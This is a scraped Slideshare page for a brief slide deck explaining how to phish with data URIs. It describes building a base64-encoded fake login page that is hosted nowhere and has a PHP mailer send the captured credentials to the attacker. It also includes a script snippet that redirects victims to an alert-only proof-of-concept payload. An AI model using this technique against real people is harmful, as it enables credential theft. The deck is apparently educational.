Phishing With Data URI

1,654
-1

Published on

New way of phishing with Data URI

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,654
On Slideshare
0
From Embeds
0
Number of Embeds
33
Actions
Shares
0
Downloads
17
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Phishing With Data URI

  1. 1. DATA URI• The data URI scheme is a URI scheme (Uniform Resource Identifier scheme) that provides a way to include data in-line in web pages as if they were external resources.• MORE INFO : http://en.wikipedia.org/wiki/Data_URI_scheme
  2. 2. PHISHING OLD METHOD Logs.txtFAKE URL login.php Username: poorguy@gmail.com Password: strong p@ssw0rd All these are hosted under a website
  3. 3. Phishing with Data URIHyperlink mailer.php/ Redirect This fake page is not hosted Mails the hacker the stolen anywhere. Its made up of username and password. DATA URI, Base64 encoded data
  4. 4. Modified source code Base64 encoded Source codeModification: send the username and passwordlogged to a php file which may mail/logs it.
  5. 5. DATA URI PHISHING data:text/html;base64, PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= Spreading<script>window.location ="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="</script>
  6. 6. • Difficult to inject JavaScript in websites.• Internet Explorer won’t support Data URILimitations
  7. 7. DEMO
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×